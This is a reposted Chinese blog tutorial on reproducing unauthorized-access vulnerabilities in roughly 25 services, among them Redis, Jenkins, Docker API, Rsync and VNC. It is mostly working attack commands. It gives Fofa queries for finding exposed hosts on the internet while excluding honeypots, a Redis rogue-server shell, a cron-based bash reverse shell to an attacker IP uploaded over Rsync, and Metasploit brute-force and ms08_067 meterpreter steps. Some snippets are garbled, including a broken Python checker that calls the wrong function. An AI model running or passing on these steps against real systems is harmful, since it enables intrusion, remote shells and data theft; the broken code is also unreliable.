0


【未授权访问漏洞复现~~~】

一: Redis未授权访问漏洞

步骤一:进入vulhub目录使用以下命令启动靶机…

进入目录:cd /vulhub-master/redis/4-unacc
启动:docker-compose up-d
检查:docker-compose ps

步骤二:在Kali上安装redis程序进行服务的链接.

#安装redis
apt-get install redis
#redis链接
redis-cli -h 192.168.4.176 -p 6379
#redis常见命令
 (1)查看信息:info
 (2)删除所有数据库内容:flushall
 (3)刷新数据库:flushdb
 (4)看所有键:KEYS *,使用select num可以查看键值数据。
 (5)设置变量:set test“whoami"
 (6)config set dir dirpath 设置路径等配置
 (7)config get dir/dbfilename 获取路径及数据配置信息
 (8)save保存
 (9)get 变量,查看变量名称

image-20240805203016935

步骤三:可以直接连接执行命令且不需要认证说明存在未授权访问漏洞…下载以下攻击项目…

https://github.com/n0b0dyCN/redis-rogue-server

步骤四:使用工具执行以下命令获取目标的命令执行环境,交互时输入i键会获取Shell环境

python3 redis-rogue-server.py --rhost 192.168.4.176 --lhost 192.168.4.108

image-20240805204745397

二: MongoDB未授权访问漏洞

步骤一:在Kali上执行以下命令搭建起MongoDB的漏洞环境…

拉取镜像:docker pull mongo
启动容器:docker run -d -p 27017:27017 --name mongodb mongo
查看容器:docker ps -a

步骤二:使用Nmap的插件脚本进行扫描…发现存在未授权访问漏洞.

# 扫描命令
nmap -p 27017 --script mongodb-info 192.168.4.176

image-20240805205215476

步骤三:也可尝试使用MSF中的模块进行漏洞测试…不需要认证即可直接连接

use auxiliary/scanner/mongodb/mongodb_login
show options
set rhosts 192.168.4.128
set threads 15
exploit

image-20240805205741295

步骤四:即存在未授权访问漏洞使用Navicat进行连接

image-20240805205914845

三: Memcached未授权访问漏洞

步骤一:下载Memcached程序并执行以下命令…启动Memcached漏洞环境

#emcached程序下载
https://www.121down.com/soft/softview-28366.html
https://www.runoob.com/memcached/window-install-memcached.htm
#执行命令
memcached.exe -d install
memcached.exe -d start

步骤二:使用TeInet程序探测目标的11211端口.

#Telnet探测
telnet 192.168.4.199 11211
#操作命令
stats //查看memcache服务状态
stats items //查看所有items
stats cachedump 390//获得缓存key
get:state:264861539228401373:261588 //通过key读取相应value获得实际缓存内容,造成敏感信息泄露

image-20240805210826638

步骤三:使用Nmap程序的脚本进行漏洞扫描

nmap -p11211 --script memcached-info 192.168.4.199

image-20240805210630672

步骤四:漏洞探测脚本(参考)

#!/usr/bin/env python#_*_ coding:utf_8_*defMemcache_check(ip, port=11211,timeout=5):try:
        socket.setdefaulttimeout(timeout)
        s=socket.socket(socket.AF INET,socket.SOCK STREAM)
        s.connect((ip,int(port)))
        s.send("stats\r\n")
        result =s.recv(1024)if"STAT version"in result:print'[+]Memcache Unauthorized:'+ip+':'+str(port)except Exception,e:pass
if__name__=='__main__':
    Elasticsearch check("127.0.0.1")
四: Zookeeper未授权访问漏洞

步骤一:使用以下Fofa语法搜索资产信息.

port="2181"

步骤二:在Kali中使用以下命令进行未授权访问漏洞测试,

echo envi | nc ip port

my:
3.5.192.161 2181

image-20240805202312471

步骤三:可使用Zookeeper可视化管理工具进行连接…

#工具下载
https://issues.apache.org/jira/secure/attachment/12436620/ZooInspector.zip

image-20240805202602945

五: Jenkins未授权访问漏洞

步骤一:使用以下fofa语法进行产品搜索.

port="8080" && app="JENKINS" && title=="Dashboard [Jenkins]"

步骤二:在打开的URL中…点击 Manage Jenkins–>ScritpConsole 在执行以下命令

#执行命令
println "whoami" .execute().text
#命令执行页面
http://125.63.109.2:8080/manage/script/index.php

image-20240805200952439

image-20240805201241792

六: Jupyter NoteBook未授权访问漏洞

步骤一:通过以下fofa语法进行产品搜索…或使用vulhub启动靶场…

#fofa语法
"Jupyter Notebook" && port="8888"
#vulhub靶场
cd /vulhub/jupyter/notebook-rce
docker-compose up -d

步骤二:如果存在未授权访问漏洞则直接访问 http://IP:8888会直接跳到web管理界面,不需要输入密码。
image-20240805113058732

步骤三:从New->Terminal 新建一个终端,通过新建的终端可执行任意命令

#命令执行页面
http://ip/terminals/1

image-20240805113158346

七、Elasticsearch未授权访问漏洞

步骤一:使用以下Fofa语法进行Elasticsearch产品搜索:

"Elasticsearch" && port="9200"

步骤二:存在未授权访问则直接进入到信息页面…不需要输入用户密码登陆.

#目标地址

#访问测试
http://localhost:9200/_plugin/head/web管理界面
http://localhost:9200/_cat/indices
http://localhost:9200/_river/_search 查看数据库敏感信息
http://localhost:9200/_nodes查看节点数据

image-20240805095843893

步骤三:可按照上面查看节点信息等、

image-20240805095912359

八、Kibana未授权访问漏洞

步骤一:使用以下Fofa语句搜索Kibana产品…并打开页面…

"kibana" && port="5601"

步骤二:直接访问Kibana的页面且无需账号密码可以登陆进入界面.

#拼接路径
HTTP://{IP}/app/kibana#/
#eg

my:
http://ip:5601/app/kibana#/

http://ip:5601/app/home#/
http://ip:5601/app/kibana_overview#/

image-20240805101148181

image-20240805101449384

九、Docker Remote APl未授权访问漏洞*

步骤一:使用以下Fofa语句对Docker产品进行搜索…

port="2375"

步骤二:直接使用浏览器访问以下路径…

http://ip:2375/version #查看版本信息
http://ip:2375/info #查看容器信息

image-20240805111603262

步骤三:使用-H参数连接目标主机的docker,使用ps命令查询目标系统运行的镜像。

docker-H tcp://ip:2375 psdocker-H tcp://ip:2375 version
docker-H tcp://ip:2375 exec-it 1f4 /bin/bash
操作思路:
    docker pull 下载有Docker逃逸的容器下来d
    ocker逃逸间接获取安装docker主机控制权限

image-20240805112343197

十、Kubernetes Api Server未授权访问漏洞

步骤一:使用以下Fofa语法搜索Kubernetes产品…

port="8080" && app="Kubernetes"

步骤二:在打开的网页中直接访问 8080 端口会返回可用的 API列表…

image-20240805094633046

十一:Hadoop未授权访问漏洞

步骤一:使用以下FOFA语法进行Hadoop产品的搜索…

port="8088" && app="Hadoop"

步骤二:开启页面直接访问不经过用户密码验证…

http://ip:8088/cluster

image-20240805104523382

十二:ActiveMQ未授权访问漏洞

步骤一:使用以下Fofa语法搜索产品…

body="ActiveMQ" && port="8161"

步骤二:ActiveMQ默认使用8161端口,默认用户名和密码是 admin/admin,在打开的页面输入…

http://ip:8161/
http://ip/admin/

第一种

image-20240805105152051

image-20240805105057779

第二种

image-20240805104745887

image-20240805104830399

十三:RabbitMQ未授权访问漏洞

步骤一:使用以下Fofa语法对RabbitMQ产品进行搜索…

port="15672"
port="15692"
port="25672"

步骤二:在打开的页面中可输入默认的账号和密码进行登陆

默认账号密码都是guest
http://ip15672/
http://ip:15672/

image-20240805105734307

十四:Springboot Actuator未授权访问漏洞

Actuator 是 springboot 提供的用来对应用系统进行自省和监控的功能模块。其提供的执行器端点分为两类:原生端点和用户自定义扩展端点,原生端点主要有:

/dump -显示线程转储(包括堆栈跟踪)
/autoconfig -显示自动配置报告
/configprops-显示配置属性
/trace -显示最后几条HTTP消息(可能包含会话标识符)
/logfile - 输出日志文件的内容
/shutdown -关闭应用程序
/info - 显示应用信息
/metrics -显示当前应用的'指标"信息
/health - 显示应用程序的健康指标
/beans-显示Spring Beans的完整列表
/mappings-显示所有MVC控制器映射
/env - 提供对配置环境的访问
/restart-重新启动应用程序

步骤一:使用以下Fofa语句搜索资产并打开页面访问.

icon_hash="116323821"

步骤二:当 web 应用程序出现 4xx、5xx 错误时显示类似以下页面就能确定当前 web 应用是使用了springboot 框架…

http://ip/

image-20240805110930700

步骤三:拼接以下路径查看泄露的数据

访问/trace端点获取基本的 HTTP 请求跟踪信息(时间戳、HTTP 头等),如果存在登录用户的操作请求,可以伪造cookie进行登录。
访问/env端点获取全部环境属性,由于 actuator 会监控站点 mysql、mangodb 之类的数据库服务,所以通过监控信息有时可以mysql、mangodb 数据库信息,如果数据库正好开放在公网,那么造成的危害是巨大的。
git 项目地址泄露,这个一般是在/health 路径,比如如下站点,访问其 health 路径可探测到站点 git 项目地址。
my:
https://ip/

image-20240805110712888

十五:FTP未授权访问漏洞(匿名登陆)

步骤一:对目标环境在资源管理器中用以下格式访问…如果该服务器开启了匿名登陆,则可直接进行内容查看…

ftp://ip:port/

image-20240805114930610

image-20240805115618994

十六:JBoss未授权访问漏洞

步骤一:使用以下语法搜索Jboss产品并打开其页面.

title="Welcome to JBoss"

步骤二:拼接以下路径且无需认证直接进入控制页面.

#拼接路径
http://ip:port/jmx-console/

image-20240805153724576

image-20240805153543627

步骤三:后续可以利用 jboss.deployment 部署shell

十七:Ldap未授权访问漏洞

步骤一:使用以下Fofa语法搜索使用Idap服务的产品.….并通过Ldapadmin可视化工具做连接验证…

#Fofa语法
port="389"
http://www.ldapadmin.org/download/index.html
https://sourceforge.net/projects/ldapadmin/

步骤二:启动工具并测试存在未授权的LDAP服务…成功如下.
在这里插入图片描述

步骤三:连接目标LDAP服务并查看其内容

image-20240805160527541

十八:Rsync未授权访问漏洞

步骤一:在 fofa 中搜索该资产语法如下并在Vulhub中开启靶场!!!

# Fofa语法
(port="873") && (is_honeypot=false && is_fraud=false)
# 启动靶场
cd vulhub/rsync/common
docker-compose up-d

步骤二:可使用Nmap扫描该端口是否开启服务,还可以使用Metasploit中关于允许匿名访问的rsync扫描模块进行探测…

# nmap命令
nmap -p 873 --script rsync-list-modules ipaddress
# Metasploit模块
auxiliary/scanner/rsync/modules list

image-20240805184739996

步骤三:使用命令进行链接并读取文件

执行命令#
rsync rsync://192.168.124.153:873/
rsync rsync://192.168.124.153:873/src/

image-20240805184840015

步骤四:对系统中的敏感文件下载操作…/etc/passwd

# 执行命令
命令格式:rsync rsync://IP:port/src/etc/passwd 目标路径
例如:rsync rsync://192.168.124.153:873/src/etc/passwd /tmp/tmp/
# 结果查看
root@kali:/# cat /tmp/tmp/passwd

image-20240805184921581

步骤五:上传文件…如果有相应的jsp/asp/php环境可以写一句话以phpinfo为例.

#攻击机操作
root@kali:/# echo "<?php phpinfo();?>" > phpinfo.php
root@kali:/# cat ./phpinfo.php
root@kali:/# rsync ./phpinfo.php rsync://192.168.124.153:873/src/home

# 靶机操作
root@4448da0725bd:/#ls
root@4448da0725bd:/# cd home/
root@4448da0725bd:/home#ls
phpinfo.php
root@4448da0725bd:/home# cat phpinfo.php

image-20240805185004953

image-20240805185047236

步骤六:反弹shell…在此可利用定时任务cron来反弹获取shell

# 1.查看定时任务
root@kali:/# rsync rsync://192.168.124.153:873/src/etc/crontab

# 2.将定时任务文件下载下来
rsync rsync://192.168.124.153/src/etc/crontab /tmp/tmp/crontab.txt

# 3.定时任务内容为,大致意思为每17分钟调用一次/etc/cron.hourly

# 4.创建shell文件
#!/bin/bash
/bin/bash i>& /dev/tcp/10.10.10.128/4444 0>&1

chmod 777 shell

#6.上传shell至靶机
root@kali:/#rsync -av /tmp/tmp/shell rsync://192.168.124.153:873/src/etc/cron.hourly

# 7.攻击机开启nc监听相应端口
nc -lvp 4444

image-20240805191603563

十九:VNC未授权访问漏洞

步骤一:使用以下语句在Fofa上进行资产收集…

(port="5900") && (is_honeypot=false && is_fraud=false)

步骤二:可通过MSF中的模块进行检测与漏洞利用.

# VNC未授权检测
msf6>use auxiliary/scanner/vnc/vnc none_auth
msf6 auxiliary(scanner/vnc/vnc none_auth)>show options
msf6 auxiliary(scanner/vnc/vnc none_auth)>set rhosts 192.168.168.200-254
msf6 auxiliary(scanner/vnc/vnc none_auth)>set threads 100
msf6 auxiliary(scanner/vnc/vnc none_auth)>run

# VNC密码爆破
msf6>use auxiliary/scanner/vnc/vnc_login
msf6 auxiliary(scanner/vnc/vnc login)>192.168.168.228
msf6 auxiliary(scanner/vnc/vnc login)>set rhosts 192.168.168.228
msf6 auxiliary(scanner/vnc/vnc login)>set blank_passwords true /密码爆破
msf6 auxiliary(scanner/vnc/vnc login)>run

# 加载攻击模块
msf6 exploit(windows/smb/ms08 067_netapi)>use exploit/windows/smb/ms08_067_netapi
msf6 exploit(windows/smb/ms08 067_netapi)>set payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08 067 netapi)>set rhosts 192.168.168.228
msf6 exploit(windows/smb/ms08 067 netapi)>set lhost 192.168.168.102
msf6 exploit(windows/smb/ms08 067 netapi)>set target 34
msf6 exploit(windows/smb/ms08 067 netapi)>exploit
获取会话后,直接run vnc可控制远程虚拟机

# 直接控制远程机器
msf6 >use exploit/multi/handler
msf6 exploit(multi/handler)>set payload windows/vncinject/reverse_tcp
msf6 exploit(multi/handler)>set lhost 192.168.168.102
msf6 exploit(multi/handler)>set lport 4466
msf6 exploit(multi/handler)>exploit

步骤三:VNC链接验证…

vncviewer ipaddress
二十:Dubbo未授权访问漏洞

步骤一:使用以下语句在Fofa上进行资产收集.

(app="APACHE-dubbo") && (is_honeypot=false && is_fraud=false)

步骤二:使用TeInet程序直接进行链接测试…

telnet IP port

image-20240805152925428

二十一:NSF共享目录未授权访问

步骤一:使用以下语句在Fofa上进行资产收集.

"nfs"

步骤二:执行命令进行漏洞复现….

#安装nfs客户端
apt install nfs-common

#查看nfs服务器上的共享目录
showmount -e ip

#挂载相应共享目录到本地
mount -t nfs ip:/grdata /mnt

#卸载目录
umount /mnt

image-20240805193836739

二十二:Druid未授权访问漏洞

步骤一:使用以下语句在Fofa与Google上进行资产收集.

# Fofa
title="Druid Stat Index"

#PHPINFO页面
inurl:phpinfo.php intitle:phpinfo()info.php test.php

# Druid未授权访问
inurl:"druid/index.html" intitle:"Druid Stat Index'

步骤二:对访问到的站点查看…

http://ip:8010/druid/websession.html
http://ip:8088/pos/druid/websession.html

image-20240805194553851

步骤三:Druid批量扫描脚本…

https://github.com/MzzdTOT/CVE-2021-34045
二十三:CouchDB未授权访问

步骤一:使用以下语句在Fofa上进行资产收集…或开启Vulhub靶场进行操作…

# 搜索语法
(port="5984") && (is_honeypot=false && is_fraud=false)

# Vulhub靶场
cd /vulhub/couchdb/CVE-2017-12636
docker-compose up -d

步骤二:执行未授权访问测试命令

curl 192.168.1.4:5984 
curl 192.168.1.4:5984/_config

image-20240805195846564

步骤三:反弹Shell参考…

https://blog.csdnnet/qq_45746681/article/details/108933389
二十四:Altassian Crowd未授权访问漏洞

(等待更新)

二十五:RTSP未授权访问漏洞
VLC media player,单击“媒体”选项,选择“打开网络串流”。
在弹出的窗口中输入网络URL:
rtsp://admin:[email protected]:554/cam/realmonitor?channel=2&subtype=1
username:用户名。例如admin。
  password:密码。例如admin。
  ip:为设备IP。例如 192.168.1.1.
  port:端口号默认为554,若为默认可不填写。
  channel:通道号,起始为1。例如通道2,则为channel=2
  subtype:码流类型,主码流为0(即subtype=0),辅码流为1(即subtype=1)

步骤一:使用以下语句在Fofa上进行资产收集.

(port=“554") && (is_honeypot=false && is_fraud=false) && protocol="rtsp'

本文转载自: https://blog.csdn.net/m0_59151303/article/details/140937156
版权归原作者 网友小黑 所有, 如有侵权,请联系我们删除。

“【未授权访问漏洞复现~~~】”的评论:

还没有评论